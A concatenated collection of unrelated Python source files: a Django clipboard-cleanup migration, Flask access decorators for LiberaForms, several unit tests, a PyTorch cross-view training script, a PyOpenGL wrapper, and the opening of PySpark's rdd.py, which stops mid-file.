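# Illustrative invocation sketch (not part of the original script): VUnit's CLI
# is parsed by from_argv(), so typical runs of this file look like:
#
#   python <this_script>.py --list             # enumerate discovered testbenches
#   python <this_script>.py -p 4               # run with 4 parallel simulations
#   python <this_script>.py "*tb_lcr_filter*"  # run testbenches matching a pattern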
|
py | 7dfa13e634f8cf1f4320f1629fef63754f136d75 | # -*- coding: utf-8 -*-
from django.db import models, migrations
def delete_extra_clipboards(apps, schema_editor):
"""
Delete duplicate clipboards (keep the one with the most files) so a unique
user constraint can be added.
"""
User = apps.get_model("auth", "User")
users = (User.objects.all()
.annotate(nr_clipboards=models.Count('filer_clipboards'))
.filter(nr_clipboards__gt=1))
if not users:
print("Nobody has more than one clipboard. Nothing to do here.")
return
for user in users:
clipboards = user.filer_clipboards.all()
print("Removing duplicate clipboards for {}, id {} (has {})".format(
user, user.id, len(clipboards)))
clipboard_to_stay = max(clipboards, key=lambda c: c.clipboarditem_set.all().count())
for clipboard in clipboards:
if clipboard != clipboard_to_stay:
print("Deleting clipboard with id {}".format(clipboard.id))
clipboard.delete()
def show_rollback_info_message(apps, schema_editor):
print("Clipboards do not need to be changed.")
class Migration(migrations.Migration):
dependencies = [
('filer', '0002_auto_20150928_1109'),
]
operations = [
migrations.RunPython(delete_extra_clipboards,
show_rollback_info_message)
]
|
py | 7dfa149931b5f2e3fe89861575bfba913042a670 | # -*- coding: utf-8 -*-
"""
@Datetime: 2018/10/21
@Author: Zhang Yafei
"""
from kingadmin import sites
from student import models
from kingadmin.admin_base import BaseKingAdmin
print('student kingadmin.....')
class TestAdmin(BaseKingAdmin):
list_display = ['name',]
sites.site.register(models.Test,TestAdmin) |
py | 7dfa151a274491052d2bdf5978745cadadc19ffa | """
This file is part of LiberaForms.
# SPDX-FileCopyrightText: 2020 LiberaForms.org
# SPDX-License-Identifier: AGPL-3.0-or-later
"""
from functools import wraps
from flask import current_app, request, g, jsonify
from flask import redirect, url_for, render_template, flash
from flask_babel import gettext as _
from liberaforms.utils import sanitizers
from liberaforms.utils import validators
def login_required(f):
@wraps(f)
def wrap(*args, **kwargs):
if g.current_user:
return f(*args, **kwargs)
else:
return redirect(url_for('main_bp.index'))
return wrap
def enabled_user_required(f):
@wraps(f)
def wrap(*args, **kwargs):
if g.current_user and g.current_user.enabled:
return f(*args, **kwargs)
elif g.current_user:
current_app.logger.info(f'Disabled user denied: {request.path}')
else:
current_app.logger.info(f'Anon user denied: {request.path}')
return redirect(url_for('main_bp.index'))
return wrap
def enabled_user_required__json(f):
@wraps(f)
def wrap(*args, **kwargs):
if g.current_user and g.current_user.enabled:
return f(*args, **kwargs)
elif g.current_user:
current_app.logger.info(f'Disabled user denied: {request.path}')
else:
current_app.logger.info(f'Anon user denied: {request.path}')
return jsonify("Denied"), 401
return wrap
def admin_required(f):
@wraps(f)
def wrap(*args, **kwargs):
if g.is_admin:
return f(*args, **kwargs)
elif g.current_user:
current_app.logger.info(f'Non admin user denied: {request.path}')
else:
current_app.logger.info(f'Anon user denied: {request.path}')
return redirect(url_for('main_bp.index'))
return wrap
def rootuser_required(f):
@wraps(f)
def wrap(*args, **kwargs):
if g.current_user and g.current_user.is_root_user():
return f(*args, **kwargs)
else:
return redirect(url_for('main_bp.index'))
return wrap
def anon_required(f):
@wraps(f)
def wrap(*args, **kwargs):
if g.current_user:
return redirect(url_for('main_bp.index'))
else:
return f(*args, **kwargs)
return wrap
"""
def queriedForm_editor_required(f):
@wraps(f)
def wrap(*args, **kwargs):
queriedForm=models.Form.find(id=kwargs['id'], editor_id=str(g.current_user.id))
if not queriedForm:
flash(_("Form is not available. 404"), 'warning')
return redirect(make_url_for('forms_bp.my_forms'))
kwargs['queriedForm']=queriedForm
return f(*args, **kwargs)
return wrap
"""
def sanitized_slug_required(f):
@wraps(f)
def wrap(*args, **kwargs):
if not 'slug' in kwargs:
if g.current_user:
flash("No slug found!", 'error')
return render_template('page-not-found.html'), 404
if kwargs['slug'] in current_app.config['RESERVED_SLUGS']:
if g.current_user:
flash("Reserved slug!", 'warning')
return render_template('page-not-found.html'), 404
if kwargs['slug'] != sanitizers.sanitize_slug(kwargs['slug']):
if g.current_user:
flash("That's a nasty slug!", 'warning')
return render_template('page-not-found.html'), 404
return f(*args, **kwargs)
return wrap
def sanitized_key_required(f):
@wraps(f)
def wrap(*args, **kwargs):
if not ('key' in kwargs and kwargs['key'] == sanitizers.sanitize_string(kwargs['key'])):
if g.current_user:
flash(_("That's a nasty key!"), 'warning')
return render_template('page-not-found.html'), 404
else:
return f(*args, **kwargs)
return wrap
def sanitized_token(f):
@wraps(f)
def wrap(*args, **kwargs):
if 'token' in kwargs and not validators.is_valid_UUID(kwargs['token']):
if g.current_user:
flash(_("That's a nasty token!"), 'warning')
return render_template('page-not-found.html'), 404
else:
return f(*args, **kwargs)
return wrap
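# Illustrative usage sketch (the blueprint, route and view names are assumptions,
# not part of this module): the decorators stack on Flask views in the usual way,
# with the decorator closest to the function applied first.
#
#   @form_bp.route('/<string:slug>/edit', methods=['GET', 'POST'])
#   @enabled_user_required
#   @sanitized_slug_required
#   def edit_form(slug):
#       ...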
|
py | 7dfa15f6da20a3dd1327e0038849b925dee6b49a | # coding:utf-8
from base import TestBase
class TestLowercase(TestBase):
"""Test for attributes \'lowercase\'"""
# for debug
# def tearDown(self):
# pass
text = """
<!-- MarkdownTOC autolink=true uri_encoding=false {0} -->
<!-- /MarkdownTOC -->
# ПРИМЕР EXAMPLE
# One Two Three
"""
def get_only_ascii(self, toc):
self.assert_In("- [ПРИМЕР EXAMPLE](#ПРИМЕР-example)", toc)
self.assert_In("- [One Two Three](#one-two-three)", toc)
def get_all(self, toc):
self.assert_In("- [ПРИМЕР EXAMPLE](#пример-example)", toc)
self.assert_In("- [One Two Three](#one-two-three)", toc)
def get_none(self, toc):
self.assert_In("- [ПРИМЕР EXAMPLE](#ПРИМЕР-EXAMPLE)", toc)
self.assert_In("- [One Two Three](#One-Two-Three)", toc)
def test_default(self):
toc = self.init_update(self.text.format(""))["toc"]
self.get_only_ascii(toc)
def test_false(self):
toc = self.init_update(self.text.format('lowercase="false"'))["toc"]
self.get_none(toc)
def test_only_ascii(self):
toc = self.init_update(self.text.format('lowercase="only_ascii"'))["toc"]
self.get_only_ascii(toc)
def test_all(self):
toc = self.init_update(self.text.format('lowercase="all"'))["toc"]
self.get_all(toc)
def test_others(self):
toc = self.init_update(self.text.format('lowercase="xxxxx"'))["toc"]
self.get_all(toc)
|
py | 7dfa1634a6c32fc4deaa34007e9e3f34785377f1 | """
Goal: create a session and database tables
so we can run data tests
@see https://docs.python.org/3/library/unittest.mock-examples.html
"""
import unittest
# from binascii import unhexlify
from mock import patch
from olass import utils
from olass.models import base
from olass.olass_client import OlassClient
from olass.models.patient import Patient
def dummy_get_access_token(*args, **kwargs):
return None
def dummy_get_patient_hashes(*args, **kwargs):
return {}, {}
def dummy_send_hashes_to_server(*args, **kwargs):
return True
class BaseTestCase(unittest.TestCase):
def __init__(self, *args, **kwargs):
super(BaseTestCase, self).__init__(*args, **kwargs)
@patch.multiple(OlassClient,
get_access_token=dummy_get_access_token,
# get_patient_hashes=dummy_get_patient_hashes,
send_hashes_to_server=dummy_send_hashes_to_server)
def setUp(self):
""" create all tables """
super(BaseTestCase, self).setUp()
self.app = OlassClient(config_file='config/settings_tests.py',
interactive=False,
create_tables=True)
self.session = self.app.session
self.create_patients()
# TODO: move this line to a dedicated test
self.app.run()
def tearDown(self):
""" remove all tables """
super(BaseTestCase, self).tearDown()
base.metadata.drop_all(self.app.engine)
# self.app.session.remove()
def create_patients(self):
when = utils.format_date('01-01-1950')
Patient.create(
pat_mrn=1,
pat_birth_date=when,
pat_first_name='First',
pat_last_name='Last'
)
|
py | 7dfa168209f210be044e8b4617c273e81b5b458f | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import paddle.fluid as fluid
import paddle
import paddle.fluid.dygraph as dg
import numpy as np
import unittest
class TestComplexReshape(unittest.TestCase):
def setUp(self):
self._dtypes = ["float32", "float64"]
self._places = [paddle.CPUPlace()]
if fluid.core.is_compiled_with_cuda():
self._places.append(paddle.CUDAPlace(0))
def test_shape_norm_dims(self):
for dtype in self._dtypes:
x_np = np.random.randn(
2, 3, 4).astype(dtype) + 1j * np.random.randn(2, 3,
4).astype(dtype)
shape = (2, -1)
for place in self._places:
with dg.guard(place):
x_var = dg.to_variable(x_np)
y_var = paddle.reshape(x_var, shape)
y_np = y_var.numpy()
self.assertTrue(np.allclose(np.reshape(x_np, shape), y_np))
def test_shape_omit_dims(self):
for dtype in self._dtypes:
x_np = np.random.randn(
2, 3, 4).astype(dtype) + 1j * np.random.randn(2, 3,
4).astype(dtype)
shape = (0, -1)
shape_ = (2, 12)
for place in self._places:
with dg.guard(place):
x_var = dg.to_variable(x_np)
y_var = paddle.reshape(x_var, shape)
y_np = y_var.numpy()
self.assertTrue(np.allclose(np.reshape(x_np, shape_), y_np))
if __name__ == "__main__":
unittest.main()
|
py | 7dfa17bddeca8a55544db7ac7e2f2231534abbd1 | import argparse
import os
import random
import time
from pathlib import Path
import crossView
import numpy as np
import copy
import torch
import torch.nn as nn
import torch.optim as optim
from torch.autograd import Variable
from torch.utils.data import DataLoader
from torch import autograd
# from torch.optim.lr_scheduler import ExponentialLR
# from torch.optim.lr_scheduler import StepLR
from torch.optim.lr_scheduler import MultiStepLR
# from torch.optim.lr_scheduler import CosineAnnealingLR
from tensorboardX import SummaryWriter
from PIL import Image
import matplotlib.pyplot as PLT
import matplotlib.cm as mpl_color_map
from opt import get_args
import tqdm
from losses import compute_losses
from utils import mean_IU, mean_precision
def readlines(filename):
"""Read all the lines in a text file and return as a list
"""
with open(filename, 'r') as f:
lines = f.read().splitlines()
return lines
class Trainer:
def __init__(self):
self.opt = get_args()
self.models = {}
self.weight = {"static": self.opt.static_weight, "dynamic": self.opt.dynamic_weight}
self.seed = self.opt.global_seed
self.device = "cuda"
self.criterion_d = nn.BCEWithLogitsLoss()
self.parameters_to_train = []
self.transform_parameters_to_train = []
self.detection_parameters_to_train = []
self.base_parameters_to_train = []
self.parameters_to_train = []
self.parameters_to_train_D = []
self.criterion = compute_losses()
self.create_time = time.strftime("%Y-%m-%d-%H-%M", time.localtime())
self.epoch = 0
self.start_epoch = 0
self.scheduler = 0
# Save log and models path
self.opt.log_root = os.path.join(self.opt.log_root, self.opt.split)
self.opt.save_path = os.path.join(self.opt.save_path, self.opt.split)
if self.opt.split == "argo":
self.opt.log_root = os.path.join(self.opt.log_root, self.opt.type)
self.opt.save_path = os.path.join(self.opt.save_path, self.opt.type)
self.writer = SummaryWriter(os.path.join(self.opt.log_root, self.opt.model_name, self.create_time))
self.log = open(os.path.join(self.opt.log_root, self.opt.model_name, self.create_time,
'%s.csv' % self.opt.model_name), 'w')
if self.seed != 0:
self.set_seed() # set seed
# Initializing models
self.models["encoder"] = crossView.Encoder(18, self.opt.height, self.opt.width, True)
self.models['CycledViewProjection'] = crossView.CycledViewProjection(in_dim=8)
self.models["CrossViewTransformer"] = crossView.CrossViewTransformer(128)
self.models["decoder"] = crossView.Decoder(
self.models["encoder"].resnet_encoder.num_ch_enc, self.opt.num_class)
self.models["transform_decoder"] = crossView.Decoder(
self.models["encoder"].resnet_encoder.num_ch_enc, self.opt.num_class, "transform_decoder")
for key in self.models.keys():
self.models[key].to(self.device)
if "discr" in key:
self.parameters_to_train_D += list(
self.models[key].parameters())
elif "transform" in key:
self.transform_parameters_to_train += list(self.models[key].parameters())
else:
self.base_parameters_to_train += list(self.models[key].parameters())
self.parameters_to_train = [
{"params": self.transform_parameters_to_train, "lr": self.opt.lr_transform},
{"params": self.base_parameters_to_train, "lr": self.opt.lr},
]
# Optimization
self.model_optimizer = optim.Adam(
self.parameters_to_train)
# self.scheduler = ExponentialLR(self.model_optimizer, gamma=0.98)
# self.scheduler = StepLR(self.model_optimizer, step_size=step_size, gamma=0.65)
self.scheduler = MultiStepLR(self.model_optimizer, milestones=self.opt.lr_steps, gamma=0.1)
# self.scheduler = CosineAnnealingLR(self.model_optimizer, T_max=15) # iou 35.55
        self.patch = (1, self.opt.occ_map_size // 2 ** 4,
                      self.opt.occ_map_size // 2 ** 4)
self.valid = Variable(
torch.Tensor(
np.ones(
(self.opt.batch_size,
*self.patch))),
requires_grad=False).float().cuda()
self.fake = Variable(
torch.Tensor(
np.zeros(
(self.opt.batch_size,
*self.patch))),
requires_grad=False).float().cuda()
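        # These all-ones / all-zeros label tensors match the (1, H/16, W/16)
        # patch shape above; they look like targets for a patch-based
        # discriminator loss and only matter if a "discr" model is added.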
# Data Loaders
dataset_dict = {"3Dobject": crossView.KITTIObject,
"odometry": crossView.KITTIOdometry,
"argo": crossView.Argoverse,
"raw": crossView.KITTIRAW,
"habitat": crossView.Habitat}
self.dataset = dataset_dict[self.opt.split]
fpath = os.path.join(
os.path.dirname(__file__),
"splits",
self.opt.split,
"{}_files.txt")
train_filenames = readlines(fpath.format("train"))
val_filenames = readlines(fpath.format("val"))
self.val_filenames = val_filenames
self.train_filenames = train_filenames
train_dataset = self.dataset(self.opt, train_filenames)
val_dataset = self.dataset(self.opt, val_filenames, is_train=False)
self.train_loader = DataLoader(
train_dataset,
self.opt.batch_size,
True,
num_workers=self.opt.num_workers,
pin_memory=True,
drop_last=True)
self.val_loader = DataLoader(
val_dataset,
1,
True,
num_workers=self.opt.num_workers,
pin_memory=True,
drop_last=True)
if self.opt.load_weights_folder != "":
self.load_model()
print("Using split:\n ", self.opt.split)
print(
"There are {:d} training items and {:d} validation items\n".format(
len(train_dataset),
len(val_dataset)))
def train(self):
if not os.path.isdir(self.opt.log_root):
os.mkdir(self.opt.log_root)
self.validation(self.log)
for self.epoch in range(self.start_epoch, self.opt.num_epochs + 1):
self.adjust_learning_rate(self.model_optimizer, self.epoch, self.opt.lr_steps)
loss = self.run_epoch()
output = ("Epoch: %d | lr:%.7f | Loss: %.4f | topview Loss: %.4f | transform_topview Loss: %.4f | "
"transform Loss: %.4f"
% (self.epoch, self.model_optimizer.param_groups[-1]['lr'], loss["loss"], loss["topview_loss"],
loss["transform_topview_loss"], loss["transform_loss"]))
print(output)
self.log.write(output + '\n')
self.log.flush()
for loss_name in loss:
self.writer.add_scalar(loss_name, loss[loss_name], global_step=self.epoch)
if self.epoch % self.opt.log_frequency == 0:
self.validation(self.log)
if self.opt.model_split_save:
self.save_model()
self.save_model()
def process_batch(self, inputs, validation=False):
outputs = {}
for key, input in inputs.items():
if key not in ["filename", "folder", "frame_index"]:
inputs[key] = input.to(self.device)
features = self.models["encoder"](inputs["color"])
# Cross-view Transformation Module
x_feature = features
transform_feature, retransform_features = self.models["CycledViewProjection"](features)
features = self.models["CrossViewTransformer"](features, transform_feature, retransform_features)
# print(inputs["static"].shape)
outputs["topview"] = self.models["decoder"](features)
outputs["transform_topview"] = self.models["transform_decoder"](transform_feature)
if validation:
return outputs
losses = self.criterion(self.opt, self.weight, inputs, outputs, x_feature, retransform_features)
return outputs, losses
def run_epoch(self):
self.model_optimizer.step()
loss = {
"loss": 0.0,
"topview_loss": 0.0,
"transform_loss": 0.0,
"transform_topview_loss": 0.0,
"loss_discr": 0.0
}
accumulation_steps = 8
for batch_idx, inputs in tqdm.tqdm(enumerate(self.train_loader)):
outputs, losses = self.process_batch(inputs)
self.model_optimizer.zero_grad()
losses["loss"] = losses["loss"] / accumulation_steps
losses["loss"].backward()
# if ((batch_idx + 1) % accumulation_steps) == 0:
self.model_optimizer.step()
# self.model_optimizer.zero_grad()
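            # Note: with the accumulation branch above commented out, the
            # optimizer steps on every batch, so dividing the loss by
            # accumulation_steps simply scales the gradients (and hence the
            # effective learning rate) by 1 / accumulation_steps.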
for loss_name in losses:
loss[loss_name] += losses[loss_name].item()
# self.scheduler.step()
for loss_name in loss:
loss[loss_name] /= len(self.train_loader)
return loss
def validation(self, log):
iou, mAP = np.array([0., 0.]), np.array([0., 0.])
trans_iou, trans_mAP = np.array([0., 0.]), np.array([0., 0.])
for batch_idx, inputs in tqdm.tqdm(enumerate(self.val_loader)):
with torch.no_grad():
outputs = self.process_batch(inputs, True)
pred = np.squeeze(
torch.argmax(
outputs["topview"].detach(),
1).cpu().numpy())
true = np.squeeze(
inputs[self.opt.type + "_gt"].detach().cpu().numpy())
iou += mean_IU(pred, true)
mAP += mean_precision(pred, true)
iou /= len(self.val_loader)
mAP /= len(self.val_loader)
# output = ("Epoch: %d | Validation: mIOU: %.4f mAP: %.4f" % (self.epoch, iou[1], mAP[1]))
output = ("Epoch: %d | mIoU (0) %.4f mAP (0): %.4f | mIOU (1): %.4f mAP (1): %.4f" % (self.epoch, iou[0], mAP[0], iou[1], mAP[1]))
print(output)
log.write(output + '\n')
log.flush()
def save_model(self):
save_path = os.path.join(
self.opt.save_path,
self.opt.model_name,
"weights_{}".format(
self.epoch)
)
if not os.path.exists(save_path):
os.makedirs(save_path)
for model_name, model in self.models.items():
model_path = os.path.join(save_path, "{}.pth".format(model_name))
state_dict = model.state_dict()
state_dict['epoch'] = self.epoch
if model_name == "encoder":
state_dict["height"] = self.opt.height
state_dict["width"] = self.opt.width
torch.save(state_dict, model_path)
optim_path = os.path.join(save_path, "{}.pth".format("adam"))
torch.save(self.model_optimizer.state_dict(), optim_path)
def load_model(self):
"""Load model(s) from disk
"""
self.opt.load_weights_folder = os.path.expanduser(
self.opt.load_weights_folder)
assert os.path.isdir(self.opt.load_weights_folder), \
"Cannot find folder {}".format(self.opt.load_weights_folder)
print(
"loading model from folder {}".format(
self.opt.load_weights_folder))
for key in self.models.keys():
if "discriminator" not in key:
print("Loading {} weights...".format(key))
path = os.path.join(
self.opt.load_weights_folder,
"{}.pth".format(key))
model_dict = self.models[key].state_dict()
pretrained_dict = torch.load(path)
if 'epoch' in pretrained_dict:
self.start_epoch = pretrained_dict['epoch']
pretrained_dict = {k: v for k, v in pretrained_dict.items() if k in model_dict}
model_dict.update(pretrained_dict)
self.models[key].load_state_dict(model_dict)
        # loading adam state (only possible when a weights folder was given)
        if self.opt.load_weights_folder != "":
optimizer_load_path = os.path.join(
self.opt.load_weights_folder, "adam.pth")
if os.path.isfile(optimizer_load_path):
print("Loading Adam weights")
optimizer_dict = torch.load(optimizer_load_path)
self.model_optimizer.load_state_dict(optimizer_dict)
else:
print("Cannot find Adam weights so Adam is randomly initialized")
def adjust_learning_rate(self, optimizer, epoch, lr_steps):
"""Sets the learning rate to the initial LR decayed by 10 every 25 epochs"""
decay = 0.1 ** (sum(epoch >= np.array(lr_steps)))
decay = round(decay, 2)
lr = self.opt.lr * decay
lr_transform = self.opt.lr_transform * decay
decay = self.opt.weight_decay
optimizer.param_groups[0]['lr'] = lr_transform
optimizer.param_groups[1]['lr'] = lr
optimizer.param_groups[0]['weight_decay'] = decay
optimizer.param_groups[1]['weight_decay'] = decay
# for param_group in optimizer.param_groups:
# param_group['lr'] = lr
# param_group['lr'] = lr_transform
# param_group['weight_decay'] = decay
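    # A worked example of the decay rule above (illustrative values, not the
    # project defaults): with lr_steps = [15, 30], epoch 20 has passed one
    # milestone, so decay = 0.1 ** 1 and both lr and lr_transform are scaled
    # by 0.1; from epoch 30 onwards the scale becomes 0.01.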
def set_seed(self):
seed = self.seed
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
if __name__ == "__main__":
start_time = time.ctime()
print(start_time)
trainer = Trainer()
trainer.train()
end_time = time.ctime()
print(end_time)
|
py | 7dfa17e2e8c8d9e2431c36ac66b319b483b057c1 | '''OpenGL extension EXT.multi_draw_arrays
This module customises the behaviour of the
OpenGL.raw.GLES1.EXT.multi_draw_arrays to provide a more
Python-friendly API
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/EXT/multi_draw_arrays.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES1 import _types, _glgets
from OpenGL.raw.GLES1.EXT.multi_draw_arrays import *
from OpenGL.raw.GLES1.EXT.multi_draw_arrays import _EXTENSION_NAME
def glInitMultiDrawArraysEXT():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
# INPUT glMultiDrawArraysEXT.count size not checked against 'primcount'
# INPUT glMultiDrawArraysEXT.first size not checked against 'primcount'
glMultiDrawArraysEXT=wrapper.wrapper(glMultiDrawArraysEXT).setInputArraySize(
'count', None
).setInputArraySize(
'first', None
)
# INPUT glMultiDrawElementsEXT.count size not checked against 'primcount'
# INPUT glMultiDrawElementsEXT.indices size not checked against 'primcount'
glMultiDrawElementsEXT=wrapper.wrapper(glMultiDrawElementsEXT).setInputArraySize(
'count', None
).setInputArraySize(
'indices', None
)
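# A minimal usage sketch (illustrative, not part of the autogenerated file):
# the wrapped entry points keep the C-style signature, so two triangle strips
# could be drawn in one call roughly as below, assuming a current GLES1
# context, numpy arrays for the per-primitive offsets and counts, and
# GL_TRIANGLE_STRIP imported from the GLES1 namespace:
#
#     import numpy as np
#     first = np.array([0, 4], dtype='i4')
#     count = np.array([4, 4], dtype='i4')
#     glMultiDrawArraysEXT(GL_TRIANGLE_STRIP, first, count, len(first))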
### END AUTOGENERATED SECTION |
py | 7dfa17f68a943749d7a6098ca6a4b70fc91d0b91 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
import sys
import os
import re
import operator
import shlex
import warnings
import heapq
import bisect
import random
import socket
from subprocess import Popen, PIPE
from tempfile import NamedTemporaryFile
from threading import Thread
from collections import defaultdict
from itertools import chain
from functools import reduce
from math import sqrt, log, isinf, isnan, pow, ceil
if sys.version > '3':
basestring = unicode = str
else:
from itertools import imap as map, ifilter as filter
from pyspark.serializers import NoOpSerializer, CartesianDeserializer, \
BatchedSerializer, CloudPickleSerializer, PairDeserializer, \
PickleSerializer, pack_long, AutoBatchedSerializer
from pyspark.join import python_join, python_left_outer_join, \
python_right_outer_join, python_full_outer_join, python_cogroup
from pyspark.statcounter import StatCounter
from pyspark.rddsampler import RDDSampler, RDDRangeSampler, RDDStratifiedSampler
from pyspark.storagelevel import StorageLevel
from pyspark.resultiterable import ResultIterable
from pyspark.shuffle import Aggregator, ExternalMerger, \
get_used_memory, ExternalSorter, ExternalGroupBy
from pyspark.traceback_utils import SCCallSiteSync
__all__ = ["RDD"]
def portable_hash(x):
"""
    This function returns a consistent hash code for builtin types, especially
    for None and tuples containing None.
The algorithm is similar to that one used by CPython 2.7
>>> portable_hash(None)
0
>>> portable_hash((None, 1)) & 0xffffffff
219750521
"""
if sys.version_info >= (3, 2, 3) and 'PYTHONHASHSEED' not in os.environ:
raise Exception("Randomness of hash of string should be disabled via PYTHONHASHSEED")
if x is None:
return 0
if isinstance(x, tuple):
h = 0x345678
for i in x:
h ^= portable_hash(i)
h *= 1000003
h &= sys.maxsize
h ^= len(x)
if h == -1:
h = -2
return int(h)
return hash(x)
class BoundedFloat(float):
"""
Bounded value is generated by approximate job, with confidence and low
bound and high bound.
>>> BoundedFloat(100.0, 0.95, 95.0, 105.0)
100.0
"""
def __new__(cls, mean, confidence, low, high):
obj = float.__new__(cls, mean)
obj.confidence = confidence
obj.low = low
obj.high = high
return obj
def _parse_memory(s):
"""
Parse a memory string in the format supported by Java (e.g. 1g, 200m) and
return the value in MB
>>> _parse_memory("256m")
256
>>> _parse_memory("2g")
2048
"""
units = {'g': 1024, 'm': 1, 't': 1 << 20, 'k': 1.0 / 1024}
if s[-1].lower() not in units:
raise ValueError("invalid format: " + s)
return int(float(s[:-1]) * units[s[-1].lower()])
def _load_from_socket(port, serializer):
sock = None
# Support for both IPv4 and IPv6.
# On most of IPv6-ready systems, IPv6 will take precedence.
for res in socket.getaddrinfo("localhost", port, socket.AF_UNSPEC, socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
sock = socket.socket(af, socktype, proto)
try:
sock.settimeout(3)
sock.connect(sa)
except socket.error:
sock.close()
sock = None
continue
break
if not sock:
raise Exception("could not open socket")
    # The RDD materialization time is unpredictable; if we set a timeout for the socket read
    # operation, it is very likely to fail. See SPARK-18281.
sock.settimeout(None)
# The socket will be automatically closed when garbage-collected.
return serializer.load_stream(sock.makefile("rb", 65536))
def ignore_unicode_prefix(f):
"""
    Ignore the 'u' prefix of string in doc tests, to make it work
    in both Python 2 and 3
"""
if sys.version >= '3':
# the representation of unicode string in Python 3 does not have prefix 'u',
# so remove the prefix 'u' for doc tests
literal_re = re.compile(r"(\W|^)[uU](['])", re.UNICODE)
f.__doc__ = literal_re.sub(r'\1\2', f.__doc__)
return f
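# For example, under Python 3 a doctest expectation written as u'1' in a
# wrapped docstring is rewritten to '1', so docstrings authored against the
# Python 2 unicode repr still pass when run on Python 3.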
class Partitioner(object):
def __init__(self, numPartitions, partitionFunc):
self.numPartitions = numPartitions
self.partitionFunc = partitionFunc
def __eq__(self, other):
return (isinstance(other, Partitioner) and self.numPartitions == other.numPartitions
and self.partitionFunc == other.partitionFunc)
def __call__(self, k):
return self.partitionFunc(k) % self.numPartitions
class RDD(object):
"""
A Resilient Distributed Dataset (RDD), the basic abstraction in Spark.
Represents an immutable, partitioned collection of elements that can be
operated on in parallel.
"""
def __init__(self, jrdd, ctx, jrdd_deserializer=AutoBatchedSerializer(PickleSerializer())):
self._jrdd = jrdd
self.is_cached = False
self.is_checkpointed = False
self.ctx = ctx
self._jrdd_deserializer = jrdd_deserializer
self._id = jrdd.id()
self.partitioner = None
def _pickled(self):
return self._reserialize(AutoBatchedSerializer(PickleSerializer()))
def id(self):
"""
A unique ID for this RDD (within its SparkContext).
"""
return self._id
def __repr__(self):
return self._jrdd.toString()
def __getnewargs__(self):
# This method is called when attempting to pickle an RDD, which is always an error:
raise Exception(
"It appears that you are attempting to broadcast an RDD or reference an RDD from an "
"action or transformation. RDD transformations and actions can only be invoked by the "
"driver, not inside of other transformations; for example, "
"rdd1.map(lambda x: rdd2.values.count() * x) is invalid because the values "
"transformation and count action cannot be performed inside of the rdd1.map "
"transformation. For more information, see SPARK-5063."
)
@property
def context(self):
"""
The L{SparkContext} that this RDD was created on.
"""
return self.ctx
def cache(self):
"""
Persist this RDD with the default storage level (C{MEMORY_ONLY}).
"""
self.is_cached = True
self.persist(StorageLevel.MEMORY_ONLY)
return self
def persist(self, storageLevel=StorageLevel.MEMORY_ONLY):
"""
Set this RDD's storage level to persist its values across operations
after the first time it is computed. This can only be used to assign
a new storage level if the RDD does not have a storage level set yet.
If no storage level is specified defaults to (C{MEMORY_ONLY}).
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> rdd.persist().is_cached
True
"""
self.is_cached = True
javaStorageLevel = self.ctx._getJavaStorageLevel(storageLevel)
self._jrdd.persist(javaStorageLevel)
return self
def unpersist(self):
"""
Mark the RDD as non-persistent, and remove all blocks for it from
memory and disk.
"""
self.is_cached = False
self._jrdd.unpersist()
return self
def checkpoint(self):
"""
Mark this RDD for checkpointing. It will be saved to a file inside the
checkpoint directory set with L{SparkContext.setCheckpointDir()} and
all references to its parent RDDs will be removed. This function must
be called before any job has been executed on this RDD. It is strongly
recommended that this RDD is persisted in memory, otherwise saving it
on a file will require recomputation.
"""
self.is_checkpointed = True
self._jrdd.rdd().checkpoint()
def isCheckpointed(self):
"""
Return whether this RDD is checkpointed and materialized, either reliably or locally.
"""
return self._jrdd.rdd().isCheckpointed()
def localCheckpoint(self):
"""
Mark this RDD for local checkpointing using Spark's existing caching layer.
This method is for users who wish to truncate RDD lineages while skipping the expensive
step of replicating the materialized data in a reliable distributed file system. This is
useful for RDDs with long lineages that need to be truncated periodically (e.g. GraphX).
Local checkpointing sacrifices fault-tolerance for performance. In particular, checkpointed
data is written to ephemeral local storage in the executors instead of to a reliable,
fault-tolerant storage. The effect is that if an executor fails during the computation,
the checkpointed data may no longer be accessible, causing an irrecoverable job failure.
This is NOT safe to use with dynamic allocation, which removes executors along
with their cached blocks. If you must use both features, you are advised to set
L{spark.dynamicAllocation.cachedExecutorIdleTimeout} to a high value.
The checkpoint directory set through L{SparkContext.setCheckpointDir()} is not used.
"""
self._jrdd.rdd().localCheckpoint()
def isLocallyCheckpointed(self):
"""
Return whether this RDD is marked for local checkpointing.
Exposed for testing.
"""
return self._jrdd.rdd().isLocallyCheckpointed()
def getCheckpointFile(self):
"""
Gets the name of the file to which this RDD was checkpointed
Not defined if RDD is checkpointed locally.
"""
checkpointFile = self._jrdd.rdd().getCheckpointFile()
if checkpointFile.isDefined():
return checkpointFile.get()
def map(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each element of this RDD.
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> sorted(rdd.map(lambda x: (x, 1)).collect())
[('a', 1), ('b', 1), ('c', 1)]
"""
def func(_, iterator):
return map(f, iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def flatMap(self, f, preservesPartitioning=False):
